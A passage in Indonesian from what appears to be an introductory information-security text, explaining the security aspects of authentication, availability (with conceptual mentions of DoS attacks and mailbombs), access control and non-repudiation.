informasi sudah tidak terjaga. Penggunaan enkripsi dan digital signature, misalnya dapat mengatasi
masalah ini.
3. Authentication
Aspek ini berhubungan dengan metoda untuk menyatakan bahwa informasi betul-betul asli, orang yang
mengakses atau memberikan informasi adalah betul-betul orang yang dimaksud, atau server yang kita
hubungi adalah betul-betul server yang asli.
Untuk membuktikan keaslian dokumen dapat dilakukan dengan teknologi watermarking dan digital
signature. Sedangkan untuk menguji keaslian orang atau server yang dimaksud bisa dilakukan dengan
menggunakan password, biometric (ciri-ciri khas orang), dan sejenisnya. Ada tiga hal yang dapat
ditanyakan kepada orang untuk menguji siapa dia :
* What you have (misalnya kartu identitas ~KTP,SIM,dll~)
* What you know (misalnya PIN atau password)
* What you are (misalnya sidik jari, biometric)
4. Availability
Aspek availability atau ketersedia hubungan dengan ketersediaan informasi ketika dibutuhkan. Sistem
informasi yang diserang dapat menghambat atau meniadakan akses ke informasi. Contoh hambatan
adalah serangan yang sering disebut dengan “Denial of Service attack” (DoS attack), dimana server
dikirimi permintaan (biasanya palsu) yang bertubi-tubi atau permintaan diluar perkiraan sehingga tidak
dapat melayani permintaan lain atau bahkan sampai down, hang, crash. Contoh lain adanya mailbomb,
dimana seorang pemakai dikirimi email bertubi-tubi dengan ukuran yang besar sehingga sang pemakai
tidak dapat membuka emailnya atau kesulitan mengakses emailnya.
5. Akses Kontrol
Aspek kontrol merupakan fitur-fitur keamanan yang mengontrol bagaimana user dan sistem
berkomunikasi dan berinteraksi dengan system dan sumberdaya yang lainnya. Akses kontrol melindungi

sistem dan sumberdaya dari akses yang tidak berhak dan umumnya menentukan tingkat otorisasi setelah
prosedur otentikasi berhasil dilengkapi.
Kontrol akses adalah sebuah term luas yang mencakup beberapa tipe mekanisme berbeda yang
menjalankan fitur kontrol akses pada sistem komputer, jaringan, dan informasi. Kontrol akses sangatlah
penting karena menjadi satu dari garis pertahanan pertama yang digunakan untuk menghadang akses
yang tidak berhak ke dalam sistem dan sumberdaya jaringan.
6. Non-Repudiation
Aspek ini menjaga agar seseorang tidak dapat menyangkal telah melakukan sebuah transaksi.
Penggunaan digital signature, certificates, dan teknologi kriptografi secara umum dapat menjaga aspek
ini. Akan tetapi hal ini masih harus didukung oleh hukum sehingga status dari digital signature itu jelas
legal.